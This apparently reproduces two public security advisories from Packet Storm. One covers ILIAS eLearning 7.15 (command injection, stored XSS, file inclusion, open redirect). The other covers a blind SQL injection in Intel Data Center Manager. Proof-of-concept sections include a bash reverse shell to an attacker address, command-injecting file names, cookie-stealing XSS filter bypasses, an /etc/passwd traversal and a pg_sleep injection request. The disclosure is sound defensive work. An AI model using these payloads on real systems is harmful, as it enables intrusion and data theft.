1) Authenticated Direct OS Command Injection - CVE-2022-45915  
ILIAS utilizes several third-party programs to perform tasks like creating PDF  
files or scanning uploaded files for known viruses. These are called using the  
PHP exec() function. In several instances, the arguments passed to the exec()  
function contain user input that is not properly sanitized.  
By performing malicious configuration steps or uploading dangerous files, an  
attacker can execute arbitrary system commands with the rights of the web server  
user (www-data).  
The privilege required for the different instances of command injection range  
from low rights to admin rights.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple stored cross-site scripting vulnerabilities were identified in ILIAS  
course items. These were either achieved by bypassing existing XSS filters or  
simply by exploiting missing input validation altogether. This results in the  
execution of attacker-controlled JavaScript code by the user's browser.  
The attacker requires the right to create course items, e.g., as a tutor of a  
course.

3) Local File Inclusion - CVE-2022-45918  
The included SCORM editor features a debugger that gives authors insights into  
the current SCORM player session, as well as previous sessions. When accessing  
the logs of previous sessions, the debugger fails to validate the requested  
file path, allowing for arbitrary filesystem access.

4) Open Redirect - CVE-2022-45917  
The function shib_logout.php redirects the user to a URL specified in the  
"return" parameter. Since this parameter is not validated, an attacker can use  
it to redirect a victim to an arbitrary website. This is a powerful tool in  
phishing campaigns, as it allows hiding the malicious webpage behind a link that  
looks like it would take you to the real ILIAS webpage.

Proof of concept:  
-----------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
Multiple instances of command injection vulnerabilities were identified:

a) ZIP archive upload  
Normal users with open assessments can submit their solution by uploading a ZIP  
archive. These archives are extracted on the server and scanned for viruses  
recursively. The directory and file names can be used by an attacker to inject  
system commands, e.g., by including a directory with the name  
$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker  
is able to get a reverse shell on the ILIAS webserver with the rights of the  
web server user (www-data).

b) Media object creation  
ILIAS can be configured so that users can create media objects based on files  
inside an "Upload Directory". Before these objects are created, the files are  
scanned for viruses. The file names can be used by an attacker to inject system  
commands. By placing a file with a name like $(touch /tmp/pwned) inside the  
upload directory and then creating a media object based on it, an attacker is  
able to execute arbitrary system commands with the rights of www-data on the  
server.

c) PDF document creation  
ILIAS provides users the functionality to export content as PDF files. A user  
with admin rights can configure the path to the preferred PDF renderer. An  
attacker can use this parameter to inject system commands. Due to missing  
input validation it is possible to inject multiple commands. The path to  
wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By  
changing the path to:

/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects  
to the attacker's machine on port 13373. The reverse shell is initiated when  
the export function is triggered.  
No PDF renderer has to be installed for this vulnerability to be exploitable.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple instances of stored cross-site scripting were identified:

a) Several Stored XSS Attacks in Tests  
An attacker must be able to create new tests in which the JavaScript code will  
be embedded. If a victim then later accesses one of those tests, the XSS payload will  
be triggered. The "Question" input field of a test has a filter in place, which  
correctly removes HTML tags such as <script> or  
<img src="x" onerror="alert(document.cookie)">. By making use of half open HTML  
tags, this filter can be successfully bypassed. E.g.

<img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test  
to trigger an XSS. It's important to end the JavaScript code with a quotation  
mark or space, to properly separate it from successive HTML tags, after it's  
embedded into a test.

Finally, the "Question" input field of the question type "Long Menu" was  
identified to use no filtering at all, resulting in the unrestricted use of  
arbitrary HTML tags such as <script>.

b) Stored XSS in title of course items  
An attacker with rights to create an arbitrary course item can conduct a stored  
XSS attack by setting the title of the element to:

" onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is  
triggered.

c) Stored XSS in HTML sites  
An attacker with rights to edit an HTML Learning Module can conduct a stored  
XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even  
if this behavior is intended, it is insecure and considered bad practice.

3) Local File Inclusion - CVE-2022-45918  
As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS  
platform. An attacker with access to a SCORM player can open the SCORM  
debugger and request the logs of a previous session. By changing the value of  
the "logFile" query parameter of the request, they can read arbitrary  
files of the server's filesystem. For example, to read the passwd file  
on Linux systems, an attacker can change the value of the parameter logfile  
to "../../../../../../../../../etc/passwd".

4) Open Redirect - CVE-2022-45917  
The shib_logout function is vulnerable to an open redirect.  
A URL that successfully uses this vulnerability to redirect to  
"https://www.sec-consult.com" is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities were identified in ILIAS version 7.14.  
However, a brief analysis of the source code suggests, that several  
vulnerabilities are present in versions dating back to at least 3.8.4.  
Hence it is assumed that most current versions of the product are affected.

The vulnerabilities were partly fixed in version 7.15, a complete patch is  
available with version 7.16.

Vendor contact timeline:  
------------------------  
2022-10-07: Contacting vendor through security@lists.ilias.de  
2022-10-19: Sending initial email again, as the vendor did not yet respond  
2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and  
             identified personal email addresses from the vendor's website.  
2022-10-25: Sending the advisory to the provided contact  
2022-10-31: Vendor requests more information  
2022-10-31: Sending detailed PoC  
2022-11-10: Asking for current status  
2022-11-22: Vendor confirms that patches will be available by 2022-11-26  
2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs  
2022-11-23: Vendor provides information about patched versions; CVE IDs will be  
             requested by SEC Consult  
2022-11-24: Vendor releases patched version 7.16  
2022-12-06: Public release of security advisory

Solution:  
---------  
Update ILIAS to version 7.16 or newer from the vendor's website:  
https://docu.ilias.de/goto.php?target=st_229

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF  A. Hartig, C. Schwarz, N. Schilling / @2022

ILIAS eLearning 7.15 Command Injection / XSS / LFI / Open Redirect

Intel Data Center Manager's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" is vulnerable to an authenticated, blind SQL injection attack when user-supplied input to the HTTP POST parameter "dataName" is processed by the web application. Versions 4.1 and below are affected.

    RCE Security Advisoryhttps://www.rcesecurity.com1. ADVISORY INFORMATION=======================Product:        Intel Data Center ManagerVendor URL:     https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.htmlType:           SQL Injection [CWE-89]Date found:     2022-01-21Date published: 2022-12-01CVSSv3 Score:   9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)CVE:            CVE-2022-212252. CREDITS==========This vulnerability was discovered and researched by Julien Ahrens fromRCE Security.3. VERSIONS AFFECTED====================Intel Data Center Manager 4.1 and below4. INTRODUCTION===============Energy costs are the fastest rising expense for today’s data centers. Intel® DataCenter Manager (Intel® DCM) provides real-time power and thermal consumption data,giving you the clarity you need to lower power usage, increase rack density, andprolong operation during outages.(from the vendor's homepage)5. VULNERABILITY DETAILS========================Intel DCM's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" isvulnerable to an authenticated, blind SQL Injection when user-supplied input tothe HTTP POST parameter "dataName" is processed by the web application.Since the application does not properly validate and sanitize this parameter, anattacker can inject arbitrary SQL commands against the PostgreSQL backenddatabase server of the web application.Successful exploits can allow an authenticated attacker (the lowest possibleauthorization level "Guest" is sufficient) to read and modify database contentsand execute any system commands on the underlying operating system. This way,the attacker can compromise the system's entire confidentiality, integrity, andavailability.6. PROOF OF CONCEPT===================POST /DcmConsole/DataAccessServlet?action=getRoomRackData HTTP/1.1Host: [ip-address]Cookie: JSESSIONID=[session-id]Content-Length: 153Accept: application/json, text/plain, */*Content-Type: text/plainUser-Agent: Mozilla/5.0Accept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Connection: close{"antiCSRFId":"[your-anti-csrf-id]","requestObj":{"snapshotId":1,"roomId":1,"dataName":"test');SELECT PG_SLEEP(5)--"}}(see the referenced blog post for more details)7. SOLUTION===========Update at least to version 5.0.0.46307.8. REPORT TIMELINE==================2022-01-21: Discovery of the vulnerability2022-01-21: Reported to vendor via their bug bounty program2022-01-21: Vendor response: Sent to "appropriate reviewers"2022-02-08: Vendor acknowledges the vulnerability with a severity of "medium" without sharing their CVSS calculation2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.82022-02-16: I don't accept the rating because the vendor downplayed it2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)2022-02-25: Apparently AV:A is still wrong, but I don't have more energy to fight them. However this advisory contains the proper CVSS rating.2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix2022-08-09: Vendor releases advisory INTEL-SA-006622022-12-01: Public disclosure9. REFERENCES==============https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225/https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00662.htmlhttps://github.com/MrTuxracer/advisories

Source

Packet Storm